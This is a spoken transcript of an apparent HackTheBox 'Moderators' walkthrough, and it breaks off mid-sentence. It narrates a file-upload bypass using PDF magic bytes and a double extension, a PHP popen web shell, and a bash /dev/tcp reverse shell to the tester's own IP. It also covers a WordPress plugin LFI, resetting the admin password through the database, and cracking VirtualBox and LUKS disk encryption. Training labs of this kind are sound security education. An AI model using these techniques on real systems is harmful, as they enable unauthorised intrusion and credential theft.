What's going on YouTube? This is Ipsac. I'm doing Moderators from HackTheBox, which has a lot of small challenges in it. I don't think any one in particular is incredibly tough. However, the tough part is all the enumeration and recon that goes into this box and knowing how to use the information presented to you. It starts off with a hand-built web application for a company to accept vulnerability reports. They say you must submit them in PDFs. So the challenging part here is knowing to add PDF to your extension brute force to find some information. With that information, you can exploit a file upload vulnerability in the web app, get a shell on it, and then some poking around leads you to another user that has an encrypted VDI image for VirtualBox. The challenging part here isn't decrypting it or getting the password for it. It's actually using the VDI image because VirtualBox, in order to use this, requires you to install an extension. Once you install the extension, it's easy to decrypt. The decrypted VDI has a Lux encrypted partition, so it's double encrypted. Crack that, and then you can get in and find the root password. So with that being said, let's jump in. As always, you start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it moderators, and then the IP address of 10.10.11.173. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. Then we have HTTP on port 80. Its banner tells us it's Apache, also running on Ubuntu. Doesn't seem to have that much information in nmap, so let's go take a look at the website. Going to 10.10.11.173, we get a page, and based upon this, it looks like they're a managed service provider, actually managed security provider to be specific, because they're talking about security partners right here. But I don't really see too much that's interesting. Do take note that it is made with love by Covigan. And then we have Fred, Holly, and Jane. So these are all potential users on the box. The first thing I generally do before running like a GoBust or something in the background, just take a look at the page source to see if I can tell what it's built with. If it's like a WordPress thing, I'd see WP content. Just seeing what I see here. And all this stuff looks generic. And then we have index.php, about.php, contact.php, so we know this is some type of PHP web app. We don't really see anything that indicates what it's built with. I'm guessing this is some type of template they're using because we have a comment that does nothing here, so they probably just stripped out some code there. But nothing too interesting. So I'm going to run a Pharaoh Buster with all the defaults, but we'll just specify the PHP extension. So we'll do -x php, and then output, I'm going to call this pharaohbuster.php.out, just to let me know this is a generic Pharaoh Buster, and I did the PHP extension. So looking at this, we do have a logs directory, so I'm going to copy this. I don't know why paste didn't work there. Let's just navigate to it manually, and we just get a blank thing. So this directory doesn't look like it does anything yet. So let's just go back. And we had a few links here. So service, blog, contact, about, and then home goes nowhere. So looking at service.php, we can see more text. And the key thing right here is it's saying, please note that all reports and logs must be uploaded in PDF format. For security reasons, we won't accept any other format. So they only accept PDFs, which I find a little bit funny, but I mean, it's better than accepting a docx or Word documents, right? So this looks like just filler text. We go to the next thing. We have a blog here. So they're making all the disclosures public. And looking at these links, there's no like page per blog post, it looks like. This actually kind of looks WordPressy, but it just goes to blog.php, so not WordPress. We do have reports.php and then !report 8121. So we have some type of user input here on this parameter, but let's take a look at the rest of the blog. We have this one for 221, nothing there. Another one, 3478. So what I'm going to do is send this over into Burp Suite. And then let's see if we have any SQL injection in here. We're going to do some light testing real quick. So send it in Burp Suite. Go to Repeater tab. Just send the request and we'll see what the default one looks like. And it looks like my Fairybuster is slowing down my connection. I've been having a lot of like ISP latency issues, so I'm just going to kill that so this goes quicker. There's not too much that the GoBuster tells us. So looking at this, we have 10,072 bytes. Looks like it's returning a whole page, so I just take note of the bytes so we can see what is different. I'm going to put a single quote here. We have 8,081 bytes. And going down, do we have anything unique? I don't really see anything. So what I'm going to do is go back to 4221. Looking at the page, I'm going to search for disclosure information because this comes back on the report. And then let's do one that probably doesn't exist, like a single quote. And we see disclosure information is no longer here. So I'm going to put a comment here. And let's see if anything changes. We still don't have disclosure information, so this did not make the SQL query valid. Trying with a double quote, still no matches on that. Try it with no quotes, no matches. So I don't think this is going to be SQL injectable. We could try like 4220 plus 1 to see if we have any type of like SSRF type vulnerability here. And it's not processing that because, again, no disclosure information. If we just did 4221, we see one match. So we could send this over into SQL map to keep things running in the background while we work. But I know that's not going to get me anywhere, so I'm not going to waste your time just running that command. Instead, let's just go straight to ffuf so we can fuzz this. And actually, before I do that, let's create a text file of just, let's do 1,000 to 9999. I guess we can do 1 to 9999. So we see like 1, 2, 3. I'm still not getting this disclosure information. So let's first do for I in sequence 1 through quad 9s. Do echo I. And all that's going to do is print 1 through quad 9s. Direct this to numbers. So now I have a file called numbers that has all that. So we can do ffuf. I'll do -h because I want to match a word. So let's see. Where is match? Looks like we can do MW to, nope, MR for match regex. Okay. So we'll do ffuf-u HTTP 10.10.11.173. Then we can paste this. And then for report, we just put fuzz-w for word list numbers. And then we want to match the regex. And then we will paste disclosure information. So now this should just hit all the pages testing for like an IDOR vulnerability. I think that's like an indirect object reference to see if we can hit any other reports than the ones listed in the blog. I guess we should have taken a look at all these pages to see what the reports look like. So we see domain is censored out. This is an open redirect. Here, this is SSRF. We're getting potential host names. So this one is help.something.htb. So we could potentially do like virtual host fuzzing. We go back to the content there. So nothing interesting there. Back to ffuf, we have a few. So 2589. Let's take a look at this. And that's probably going to be one we've already seen. So healtharcade.io.htb has a SQL injection. We don't know the IP address of this, and there's no DNS servers, so I'm going to ignore this for now. Actually, I guess we could test for DNS, so nslookup, server 10.10.11.173, and then put in this. Come on. Wrong clipboard. There we go. And we don't get a response back. And I know nmap didn't say anything about DNS, but DNS typically runs on UDP, and we didn't scan UDP. So that's why I was just testing it. So the next one we have is 3478. Let's take a look at this. Nothing interesting there. Go back to ffuf. I'm going to start at the bottom now, 9798. Let's paste this. And we have something interesting. This one has a logs field. Remember, we had a logs directory, but nothing was in that directory. So now we have something, right? So let's go to Moderators. We can do logs and then this, and we just get a big old white page. So what I'm going to do is run a GoBuster on this directory. We could do PharaohBuster, but I generally use PharaohBuster when I want it to automatically recurse into directories. If I just want to go into one directory, I still use GoBuster. I don't know why I changed them up, just because I guess I like to be difficult. But we'll do GoBuster, dir, the word list. We'll specify opt, seclist, discovery, raft, web content, raft small words.txt, the URL, and then the extension. I'm going to do the extension PDF because if you remember, back on this service page, they say they only accept reports, logs, in PDF format. So let's take a look if there's any PDFs in this directory. The other thing that is odd, we do see logs.pdf. That is good. This is a MD5 sum here. So I'm just going to refresh this so we can take this piece, this E21. And what I'm going to do is go to crackstation, because I know crackstation lets me crack MD5s and it has a big dictionary. I would go over to Hashcat, but typically with MD5, this will be my first bet. And I just want to see if this directory is random or not. I got to pick all the stupid vehicles. Awesome, not a robot, contrary to what you may think. But we do see this MD5 sum does crack, and the result is 9798, which is interesting because if I go back here, we do 9798. This is the report ID. So based upon the report ID, it generates this directory. And this directory also had a logs.pdf. Oh, I erased everything and went to logs.com. That was weird. Go here, white page, logs.pdf. And it says the logs have been removed. But let's go take a look at some other places. So if I look at this wfuzz, we have 2589. So, whoops, can't type exit. Let's do echo-n so we don't put a line break, 2589, MD5 sum, and we get this. So let's copy this, change it, and see if logs.pdf exists. It does. And we see log file created for report 2589, submitted. We have logs uploaded from logs report log upload.php. So we have a file upload form, I'm guessing. So right here, file upload, and it wants us to upload something, right? So let's go and create a PHP shell. So let's do HTTP, moderators. Then what I'm going to do is shell.php. And then the first thing I always do when testing PHP is just a simple echo. And then after that, we always go and try for code execution, right? So let's upload shell.php. And we can do burp suite, intercept on, upload this, put it into repeater. And then we send it. And what do we have? We see only PDF files are allowed. So what I'm going to do, paste that error in, and then we're going to play with this real quick. So I'm going to change this .php. We're going to have .pdf and see if it does anything. It still says only PDF files are allowed. Let's see, I can click this gear icon and auto scroll to match. So it's not doing it based on an extension. Maybe MIME type. I think PDFs are application PDF. We still see only PDF files are allowed. So I'm going to look at the magic bytes for a PDF real quick. So I'm going to just locate -r for regex, PDF $, to find every file that ends in PDF. And let's just XXD a random PDF. Pipe it over to head. And we can see PDFs begin with %PDF-1.4. So if I just echo this to a file, and then run file against it, it's going to detect it's a PDF based upon the magic bytes. So let's try putting the magic bytes here and then hit send. And we don't have this error anymore. It doesn't say only PDFs are allowed. It now says file upload successfully. So now the odd thing is it's not giving us any type of not user ID, but a log ID, because I expect the logs to go into a directory like log/whatever, but it's just in logs, I guess. So I'm going to just try hitting logs and then let us do, what is it? We called it shell.php.pdf. And we get file not found. So let's go back to our GoBuster. And I'm just going to, actually we can just look at the results here. Actually, no, we want to go up one directory. So we'll just go to logs and see if there's anything in this directory. We have CSS exist and also uploads. So let's try logs, then uploads, shell PHP PDF. I'm going to do, I can't view source, I guess. Maybe curl this. And we'll see what it gives us. And we have our PHP code. It's not a surprise the server didn't try to execute this because we have the extension as PDF. So let's fix that. Let's remove PDF so it ends in PHP again. And only PDF files are allowed. Let's try putting PDF before the PHP. And whoops, we don't have any error messages here. So let's now hit the new URL, pdf.php, and we see the PHP code is gone. So now let's go and rename this. Actually, we can just do it in Burp Suite to do system, then request CMD. And then send this one over. And let's go to a browser. And what is it? Shell.pdf.php. CMD is equal to ID. And we still see it just as test. So I'm guessing it won't overwrite the file. I bet if I go down here, we see like file name already exist. So let's do shell2.pdf.php. Change this over. And we don't get any output. It just says PDF 1.4, which is odd. I'm going to try like curl 10.10.14.8. See, maybe for some reason this is blind. So nclvnp80 sudo, send this over, and we don't get a hit. So the next thing I'm going to do is change this up. And instead of doing a system, I'm going to do PHPInfo. And we got to change this to like shell3.php. And if we hit shell3.php, we have the PHPInfo page. So what I'm going to look for is disabled. Let's see, is it just disable? I want to look at like disable functions. I don't know if my control F didn't work, but we have disable functions right here. And let's go and just put it in VI so we can easily read this. So paste, then %s, comma, replace it with \r. And we can see pass-through, system exec, and shell exec are disabled. So this is why we couldn't do anything, because the system command is disabled. And it's also worth mentioning, generally in disabled functions, I'll put PHPInfo in there as well, but we could have also done, I want to say, let's do, is it echo ini_get disabled _functions? I want to say this is it. Let's see what this does real quick. Shell 4. paste. That is not it. What is it? I think it's just disable functions. So let's do 5. That. Send. Then change this to be shell 5. And we have the functions here. So another way to get that piece of code or ran that you wanted. If we go to, let's see, HackTricks, PHP, code execution, I'm going to do system. What are the other ones that were blocked? Shell exec and pass through. And the reason why I'm putting all the disabled functions is like Google foo, right? So if I want to hit the HackTricks page that has a list of all the ways PHP can execute code, put a few of the disabled ones to help Google know what page you want. And then maybe you'll find it show other ways. So exec, pass through, system, shell exec. It's doing this fread, then popen. So let's try this one. So let's go back here and we can try pasting this, fread, popen. And what we're going to do is replace bin ls with just request cmd. And then what this is going to do, popen, I think it's process open, specify the process, open the handle in read mode so you can read the output. And then this fread is going to read it in 4096 bytes. So let's try sending this. Let's name this shell6.php and go back to a web browser. Shell6 cmd is equal to ID. And that did not work. See, do we have an error message here at all? File uploaded successfully. Let's see, what did I screw up? Shell6 PDF cmd is equal to ID. Let's try hard coding this. Just ID, shell 7. Let's do shell 7. View source, nothing. Let's see. Oh, I probably need echo. That's definitely it. Shell 8. I bet if I went to the HackTricks page, I just did not copy the echo. That one's on me. So there we go. Now we have the output of the ID command. We can put this back to be the request. Put an echo here. And I'm just going to call this shell 10 because I forgot where I stopped off. CMD is equal to ID. Awesome. Let's do uname, Linux. So this is good. Let's send this over to Burp Suite. Go here, proxy, refresh. Change this over to a post request. And I just want to test to make sure I can do arguments. I can. I wasn't sure because it is popen. I didn't know if we had to specify like arguments a different way. So let's just do our standard bash reverse shell. Dev TCP 10.10.14.8 is my IP. 0 and 1. URL encode this. Then we can NC LVNP 9001. I don't know where that base 64 came from. Bash-C, bash-I, dev TCP 10.10.14.8, 9001. Okay. There we go. So Python 3-C, import pty, pty.spawn, bin bash. stty raw minus echo, fg enter enter. Export term is equal to xterm, so now I can clear the screen. If I typed it right. There we go. So the first thing I do whenever I get access to a web server is just poke around the web server, see if there's any credentials in it, because most of them have some type of database. So just looking at the uploads directory, we can see all my shell attempts. Nothing too interesting there. Going up one directory, this is the other files from researchers. So I'm just going to do a find.-type f so I can see all the files. And let's see, there's a few logs.pdf and index.html. I'm going to guess this is going to be a size of 0. I can do a -ls flag so it shows me the size as well. And let's see, index.html, size 0, so I probably don't have to poke at it. I should have piped that over to less capital S to get rid of line wrapping. Oh god, that just makes it look even worse maybe. But the main thing I care about is that 0. So what I'm going to do, if I copy this, let's do an and sign, then exclamation point, paste that in, and that gets rid of everything that has size 0. And we can see there's nothing too interesting. We could look at the upload function itself, and let's see what this looks like. PHP. Oh, this is going to be a pain to look at because it's got all the HTML code. I hate looking at web apps that are just like single PHP files and not an actual framework because there's so much bloat to see things. The main thing I care about right now is a database. I'm going to grep for 127.0.0.1 and don't see anything. And the reason why I did that is because the database is probably configured to talk back to itself. So that to me was a safe grep to do. We can look for password, see if there's anything like that, and don't see that phrase. So I'm guessing there's no database here. So the next thing I want to look at before I just run a tool like linpeas is probably see the active users on the machine. So I'm going to grep for everything that ends in sh against Etsy passwd, and that tells me the users on this box. So we have root, John, and Lexi. So we can do a ps-ef and grep for root, and we get a lot of processes. So I'm going to switch that over to John. We get no processes. I look over at Lexi, and we can see there is this user local sbin startup.sh that looks like it is potentially running this PHP thing. I'm just looking at like the parent process thing. So 861. So we can see these are all intertwined. We could probably do like a -- forest. And we see here's our shell. But see the same thing here with that user bin runner and just shows all the processes. So let's take a look at startup.sh. So let's cat and paste this in. And we see all it does is execute a shell command to run a PHP web server on 127.0.0.1 port 8080, and it's running opt-site.new. So let's take a look at opt-site.new, and we see it is a WordPress website. So this looks like it is going to be running as Lexi because we see this PHP thing is underneath Lexi. So if I manage to drop a web shell here, we should get code execution as Lexi and can see things she does. So I'm going to do a find dot and then -writable to show me all writable files and folders, and we get nothing. The next thing I'm going to look at is wp-config.php because this will have database credentials, the thing I was looking for before on the last web server, and we get permission denied. So I'll do a ls-la so I can look at the permissions, and we see wp-config is read, write, execute by Lexi and members of Moderators. So that's groups. I look at my group and I'm only www data. So there's nothing there. We do have some backup file. So let's take a look at this. So if I cat this, then let's go back and look for password and username here, password here. I'm going to guess this is not the correct credentials. We can just look at the sample config. If I look at this, it is the same thing. So the next thing I'm going to look at, since I have shell here, is going to go into the plugins folder of WordPress to see if there's any like vulnerable plugins. So that's in WP content, plugins, and we can see two folders. There is BrandFolder and Password Manager. So I'm going to go inside of BrandFolder and actually, let's just search exploit for exploits. So search exploit BrandFolder, there is a LFI RFI. So I'm going to do a -X so we can examine what this is. And let's see. The vulnerability occurs in the first line of callback.php. And we can see it does require once. And then this request thing, it's getting a user parameter and wp-load.php. So if we call callback.php, specify our WordPress absolute path of a directory we control, it will include the file WP load or these. WP load is the easiest one because it doesn't have any directories. And it gives us a proof of concept right here. So what I'm going to do is go back to our shell and let's see, where was it? If I just do cd that, then HTML, uploads, where is it? Logs uploads. And I'm going to copy our shell 10 PDF thing over into dev.shm. And I'm going to use dev.shm for this because of two reasons. Number one, if the server reboots, this file goes away because this is just in memory. And number two, a lot of services now have like virtual temp directories because of systemd. So I don't like using /temp because I may be writing something to /temp, but the service itself has a different temp directory. So let's just rename shell to, what was it? I think wp-load.php if I remember right. Yeah, wp-load.php. And the reason why I'm using this shell and not the shell I did previously is because we can't use that system command, right? Let's see. I'm going to modify this and put the reverse shell here because I'm going to put it in a curl request and I don't feel like escaping everything correctly. So we can do bash-c, then bash-i, dev tcp 10.10.14.8, 9001, 0, and 1. Close both of those. And this should just give me a shell. So now the next step of the exploit is to hit callback.php and we specify our path. So here I'm going to do nclvnp 9001 and then we can curl this and it's already defaulted to localhost. The path is going to be dev.shm. We will, oh God, my terminal, not happy. Curl http localhost. I was going to say we have to change the port to be 8080. And the directory is not WordPress. So if we do this, and I spelled curl correctly, 1, 2, 3, like that. Did it hit? No. Let's see. Curl, BrandFolder, callback. I'm going to do a -v so we can see. And let's see. 200 OK. I think if I add a trailing slash, and it looks like the web server hung. And the web server hung because it gave us a shell. So what happened there? Let's go. I can just exit this real quick and we can go back to search exploit. So there's no trailing slash here. So it does WordPress absolute path and then WP load. So what had happened here is I did dev.shm and then it put a slash. It did WP load.php. And of course that doesn't exist. So I had to put that slash there for it. So run this command again. And now we're as Lexi. I'm going to go to Lexi's home directory. We have the user.txt, but most importantly, an SSH key. And I always like using SSH over reverse shell because it's just more reliable. So I'm going to copy her SSH key. And then we can vlexi.id rsa, paste this in, chmod 600, and then sh-i, this key, Lexi at 10.10.11.173, and it should let us in. So here we have SSH. The one thing I'm going to do now that we got in is I just want to curl localhost 8080 to make sure the web server works, and it's not. So what happened is this PHP, how it's executing this, doesn't look like it's multi-threaded. So because I have this shell here, I hung up the only web server thread and right now crashed the web server, which not good for anything. So whenever you get a shell on a web server, always make sure the website is functional. I'm going to kill this netcat session and we'll immediately see the web server works again. So yeah, just something to be aware of. And maybe this is just slow because it's still not working and the shell isn't there, but oh well, we have SSH as Lexi. So now what we can do is go into this site.new folder and get the wp-config.php file that has the database password. And we see it's WordPress user is the username, and the password is WordPress password 123 ! So we could look at the other users on this box. I think it was John, and try just su or John with the password we have, and we get a password failure. The other thing we have is another plugin in WordPress. If we went into plugins, there is a password manager plugin. So what I'm going to do is a MySQL-u, WordPress user-p, put in the password, and then let's take a look at the WordPress database. So use WordPress, and then let's see, show tables. And where would a password manager be? Probably WordPress PMS _ passwords, because that's probably password manager suite or something like that. So I'm going to do a describe on this table, and we have pass ID, username, whatever. So I'm going to do select stir from this. And if we just do a semicolon, it outputs, I didn't say from, outputs everything like on one line, and it's hard to read, right? So instead of semicolon, I always do \G, and it puts it in a more user-readable format. So we can see pass ID 6, username's Carlos, and then this user ID looks like a base 64 string. So echo-n, base 64-d, and it is encrypted. So we could probably reverse this encryption, or we can just log into the website and see if it tells us the password. I'm going to opt to log into the website first. So what I'm going to do is on the very first line of an SSH connection, I'm going to type squiggly C, and then that will put me into this SSH prompt. And we can say --L 8080 localhost. And I think, am I listening on? Yeah, Burp Suite's listening on port 8080. So let's say 8000, then localhost 8080. And what this is going to do is tell my local box to listen on port 8000, and any traffic there, send it through this SSH connection, and on the other end of SSH connection, direct it to localhost 8080, which is this WordPress site, right? So if I now take Burp Suite off and just do localhost 8000, it's going to say no website exists because I'm not listening on that port until I hit enter. And now I go here, and it directed me to localhost 8080. Let's see. I'm just going to disable Burp Suite real quick, and we'll do the same thing. So 8080, localhost 8080. WordPress has this really annoying habit of using like absolute URLs everywhere. So even though I hit the website on localhost 8000, it directed me to localhost 8080. Super annoying. And we have this blog. it is pretty horribly formatted because all the URLs are using moderators.htb. So if I go into my host file and say 127.0.0.1 is also moderators.htb, then we refresh this page, the WordPress post looks a bit better. So the key thing we want to do is log in. So let's go to wp-admin, and we get prompted with username and email. We don't know this, but we have access to the database through our SSH connection. So we can do the same thing, and the database or the table is WP users, and we can see we have an admin user and a Lexi user. What I'm going to do is change admin's password and then log in, and then we'll change it back. So let's just Google generate WordPress password, and then go to one of the websites that lets us do this. So password we'll make is please subscribe, generate the password hash, copy this, and then we can say update the WP users table, set user underscore pass is equal to, or password, and then where ID is equal to 1. So where ID 1, set this user password. So we're going to do this, semicolon, row changed is 1, and I'm going to copy this password. We could have also tried cracking it, but sometimes I like just changing it real quick. I'm going to do admin, and then please subscribe, log in. Yeah, this email's correct, sure. Once it logs in, come on, I will change this password back, right? So we can hit up twice and set the password back because we're logged in. We have the cookie. We don't need the password anymore. Remind me later. Is that going to work? This website is going awfully slow. So let's see. Let's just set this back and see what happens if it eventually logs in. It logged us out. So maybe saying the password back right then was not a good idea. Admin, please subscribe. So I wonder if changing the password somehow invalidates the cookie. I did not think that was the case for WordPress, but very well could be. And since this website is so slow, maybe we're just going to go and switch back to just finding a way to decrypt the password from the information we have. Oh, looks like it finally logged in. And we have this PWDMS thing. I'm going to click on import export because, well, that's what we want to do is export passwords. So clicking this and then probably wait 10 to 15 seconds for the page to load. And here it lets us do a CSV. I'm going to click everything and then export data. And it says data export successful, but it didn't download anything. Click that again. Nothing. So I'm going to click on passwords and see what this does. I'm really not sure what that export data button did. That's funny, but let's check passwords to see if it shows a way for us to see the passwords in this database. And if not, then this is just a rabbit hole and we'll have to go into the database anyways. The page finally loaded and we see the password is masked, but I see this view password button and we have begin SSH key. So we have Carl and we get Carl at the best. I wonder if this is John actually. Let's exit out of the database, su-john, paste this in. Authentication failure. Sudo-l, put this password for Lexi. I don't know what Carl's account is. We don't have a Carl on the box. Maybe he just doesn't have a shell. grep-i Carl Etsy passwd. Nothing there. But we do have John's SSH key. So I'm going to click copy. So we copy this to the clipboard. And let's get out of here. vjohn.id_rsa. that's not the clipboard. That is. And did it put everything on one line? Oh, that is annoying. Let's see. I'm guessing every space should be a new line. So let's change space to be \r\n. And let's see. I just want \r probably. There we go. And then fix this up, the end private key, and then begin, because these just have spaces. That looks much better like a key. So chmod 600, and then sh-i with this key, John at 10.10.11.173, which is Moderator's IP address, and we get logged in as John. So doing an ls-la, we see scripts and stuff. So let's check out what's in scripts. A bunch of files. And let's go into stuff. We have exp, so let's do ls-exp. I don't know what this is. Let's just take a look at a file. Looks like this is messages. But there is a VBox folder. So let's look at this. And it looks like it's a VDI, which is going to be like a VirtualBox hard drive or something. I say VirtualBox because it's in a directory code VBox, and we have VBox. It's 116 megs. If I look at this VirtualBox file, we can kind of get an idea. I'm going to use it in Vim so we have syntax highlighting. And we see it's a machine called Moderators. It's Ubuntu. We have a hard drive that's located at f:2019.vdi. This is the VDI image we see. And it is going to be an encrypted hard drive in VirtualBox. Then we also have a second hard disk. This is going to be ubuntu.vdi, which we don't see in this directory. So there's also a DVD drive. And then just what it is, like how many megs of RAM it has and things like that. But the first step is going to be getting this file on our desktop. So I'm not going to exit actually. Let us scp, so scp-i, specify a key, John at 10.10.11.173. And then we want to go in stuff, VBox, and copy these files to just our home directory. So there we have it. It's copying. It's going to take a minute or two to download this image. Actually, it's going to be much quicker. So now that it's downloaded, we could open this in VirtualBox and then get prompted for a password. But I want to keep all the VirtualBox like self-contained to one part of the video. So I'm going to jump ahead since I know it's encrypted and try to find a way to decrypt this hard drive or get the password before we open it up in VirtualBox. And the main reason is because we have to install a VirtualBox extension. So there's a few VirtualBox steps that we have to do. I'm going to first Google Hashcat VirtualBox crack, because the first time whenever I go to cracking something, Hashcat's my first bet, right? And we can see on the Hashcat forms, we have some information here. And then someone created a pull request, so we can look at the pull request and see Hashcat does have the features. And if we go to Files Changed and scroll, we can see there is going to be a Python script called, that's a module again, let's see, VirtualBox to Hashcat. So I'm just going to copy this, and we can call this VBox to Hashcat.py. And set mode paste. Whoops. Set mode paste. Set paste. Okay, that puts us in pasting mode. Let's see. View file. Raw. I could probably just wget this, right? Yeah, let's just wget. Wget. Oh, it's going to IPv6. I don't think curl does. And I could just run this on my box that has it. It may actually be on parrot already. But we have the file now. So Python 3 VBox to Hashcat. And I'm going to specify the VBox file. We have to give it the argument --VBox. And we get a hash. So let's copy this hash. And then I'm going to go on a box I call the Kraken because I always hate running Hashcat in a VM. So we go in the Hashcat directory, vhashes / I'll call this moderators.vdi, paste it in, and then we can just do hashcat .bin, put in the file, then opt word list rocku.txt, and it's going to start in auto detect mode. It should automatically detect the hash. And it looks like it is about to start. So we see it initializing the runtime. Okay. Well, almost starting to crack. Let's see how fast this goes real quick. So I can do S. How many per second? Where is it? Is that up a little bit? We can see Hashcat running. Where's the speed? Oh, 1,000 hashes per second. So I'm going to let this run. We'll see if it ends up cracking it. And after about a minute and a half, we see it recovered the password. So we can scroll up and see the password is just computer. We could also do the --show option, and it'll look at its pot file and show us the password. But now that we know the password to this VDI, we can open this up in VirtualBox, where it should ask us the password. So before I do that, let's go into this file itself. And the one thing I want to change is where it's loading this VDI image for. It's not F:, right? We want to put the full path where it is. And that's going to be home ipsec HTTP moderators. I'm actually going to make the VBox directory, and then we can move 2019 to VBox. So we just keep everything in a directory. Let's close this. Oh, I was editing it on the box itself. Didn't realize that's where I was. So pwd, copy this, v2019 0801.vbox, f. And I know it tells us not to modify this file, but we like to live dangerously, right? So the path is set there. So the next step I'm going to do is just open my home directory. Let's go to HTTP moderators VBox. And then I'm just going to double click this file and it opens up VirtualBox. Now, there is an extension in VirtualBox that we'll have to install to support this encryption. I think it's some weird licensing thing. So I'm going to do VirtualBox extension, go to Google. Let's see. Is this it? Wiki downloads. Let's see. Extension pack. So we're not on VirtualBox 7. If I do, let's see, help. Is there about? I need 6132. So this is not it. Older builds. 61. And then we want to get to 6132. And yours may differ. So make sure you grab the one that you want. And I'm going to download extension pack. So we can save this. And it has been downloaded. Then I can go File, Preferences, Extensions. Actually, before I do that, let's try powering this machine on, right? So if I click Start, we have an error. It can't open because it can't find the Ubuntu VDI. So let me just go in the settings and we will remove this ubuntu.vdi. We just want that 2019. USB, I don't need to enable the controller support. There was a CD drive I thought I saw somewhere, but I don't see it mounted, so that's fine. So if I click Start Now, is it going to ask? It just says failed, cannot open medium. Oh, shoot. We renamed where that was, and it's not changed here. right? Because I look at the details, I don't see it in the VBox folder. So I'm just going to move 2019.vdi up one directory because I don't feel like editing it in the config. So it's just to boot up, and then we'll probably get a failure of it not being able to do anything. So it should ask us for the password, and I think it's going to after we install the extension. So a roundabout way just to show the behavior. I'm going to install the extension, install, scroll to the bottom, pretending we read that, and then install it. Looks like it has been installed. Now if I go to start this, it never asks for the password. There we go. Now it asks for a password. I'm not going to enter that in. What a lot of people did is they boot into an ISO here and then access the VDI. What I'm going to use is the VBoxManage script to decrypt it. So let's see. 2019 VBox. It is still pointed at that directory. That's fine. All I was saying is if this configuration file had home HTTP moderators or moderators VBox to see if I had to move that VDI file again. So let's do VBoxManage, and then let's see, grep encrypt. And this is going to be weird. We're going to call encrypt medium, but we decrypt it. It's weird because if you call encrypt medium and just specify the old password, then it's just going to decrypt that VDI. So, yeah. So encrypt medium, and then we want to specify the UUID of the disk. So if I go tools, media, 2019, information, we get the UUID here. I'm just going to put it in quotes. I don't think we have to, but better be safe than sorry. And then -- old password. We can either give it a file or a dash. I'm going to do dash because that specifies standard in, and it asks us for the password. We can do computer, and it says it has been completed. If we didn't install the plugin, this would actually error saying like can't read encryption type or something. But now we have a decrypted VDI. So the next thing to do is Google how to mount VDI. And let's see. Maybe this one. This is using P7-zip. We don't want that. Right here. So we use QEMU-NBD. So first we do mod probe to create a network block device. And what that does is creates like /dev NBD 0. And if I do file against this, we just see block special. There's a file flag I want. Let's see. Is it -m? No. Preserve data. I want -s. When you're doing file against special files, you use the -s flag so it follows it. And this is probably going to say empty, right? So right now, the block device is empty. If we run this sudo QEMU network block device, specify the block device that we created, and then the VDI, it mounts it there. So we do this, and then 2019.vdi. And now I'm going to run this file command again without the -s, and we see it just says it's network block special. If I do the -s to say, yes, I know it's a special file, it tells us it's a LUX encrypted file. So now we're dealing with a encrypted hard drive. So this is double encrypted. And we have to figure out how to decrypt LUX. And if we look at Hashcat example hashes, let's see. We're going to find out we can't decrypt this with Hashcat, which is a bit of a pain. And the reason why is it is LUX version 2 as file told us, and Hashcat only supports LUX version 1 currently. So we see all these version 1s. So instead of using Hashcat, let's just go to Google and search cracking Lux. And it brings us to this blog post from Diverto, which is a really good one. I'd recommend reading it, but you can see it's pretty lengthy, so I'm not going to go into everything. I'm just going to go to the repository he links. Let's see. Is this it? Yes. So we can see on his repo, he has this crypt setup pwguess. And if we go over here and go to releases, he has a static Linux build. So we can just copy this and wget it. And then chmod plus x, brute linux static like this. And let's see, we need to give it the path to the Lux volume. So that's going to be dev nbd0 because that's where we have it mounted. And then we want to give it a file. So read password from a file. We can do user share word list, then rocku.txt. And dev nbd is not a, maybe sudo. There we go. That looks like it did it. I saw, oh, we don't have permission to access it. Probably going to be sudo. So running the script, it's not giving any output. Is there anything else we needed to do? We could have done a few threads. Let's see. I'm going to put the argument first. So -f. There we go. Using dictionary mode. Awesome. So I was expecting to see a little bit more output, but maybe it's setting things up or it doesn't give any type of status. Let's see. We do options, beginning a password, end a password, read from file. Print progress every n seconds. So we should have done a -v, but we can see it already tried. We have the password ABC123. So now we have to mount this Lux volume. So I'm going to Google mount Lux volume. I know there's like a crypt setup command, right? So let's see, what is it? Crypt setup Lux open. So we're going to run this sudo crypt setup Lux open, the network block device 0, and then we specify a name. So let's do sudo crypt setup Lux open. Okay. My tab autocomplete wasn't working, so I was confused. Dev nbd0. And then we want to name this something. I'm going to name it Moderators. And what this is going to do is map something under dev mapper. So if I do sudo lsla dev mapper, we see it only has control. So do this ABC123. Now we have mounted this drive. I'm going to do this ls on dev mapper again, and we see Moderators has been mounted. So I can do sudo mount dev mapper Moderators, then /mount, and we go here, and now we're in the Lux folder. So it has a lost and found in the scripts. We look at scripts, and we have a lot of files. So we could manually look through all these files looking for some type of password or a secret, but that's going to be a lot, right? So there's a lot of things I do when I look for passwords. The first one is I just look at entropy of things, right? So if I look at all-in-one, let's look at adls.ps. Let's see. I'm trying to think of the best way to do this. So what we want to do is search all variables in this, because maybe someone's going to do password is equal to something. And generally when variables are set or strings are set, they're inside of quotes. With passwords, it's generally going to be single quotes because you never want to worry about escaping things. So I'm just going to create a grep to show me everything between single quotes. So we do -O capital P. I don't know exactly what this stands for. I just remember it because it's overpowered with all the things you can do. I'm going to do a open parenthesis, and then we're going to say single quote dot star question mark single quote. And what this is going to do is have grep only show us what's in between these parentheses. And what we want is something that begins with a single quote, can be anything, and then ends with a single quote, right? And then I can do -r to make this recursive, and period. And we can see it's showing us every variable here, right? So now the next thing we want is to not show us file names. And I think that's -no file name. And now we have just a list of variables. So what we want to do is create a loop. So for I in this, do echo I. And this is going to be the same thing. Let's see. For I in, why did that fail? Oh, because I said in, did not type it. So now we have a loop that goes on every single input. So I'm going to do x is equal to, then we'll go echo -ni, pipe it over to ent, and then echo x. So if I do this, we can see entropy here, right? And all we want to do is grab entropy. So I'm going to grep for entropy, and then I'm going to pipe this into awk, and we're going to print the third field. So 1, 2, 3. So now when I run this, we just have a list of all the entropy of every variable. So now my echo, I'm going to do echo x, and then space I. And now we have entropy, and then what the variable of that was. So now what we can do is a sort command. So we'll do sort -n, and all the phrases that have high entropy will be at the bottom. And this just highlights strings. Just looking through these, looking for one that stands out. The best sysadmin here stands out. And this works because password definitions or password requirements try to make them to be somewhat high entropy. By that, what I mean is not repeat characters. And they do that with all the substitution, things like that. So let's just take a quick step real quick. So we look at this. So we echo and then send to entropy. We see this is 4.02. Actually, before we do that, let's look at ABC123. And we see it's 2.8. You may 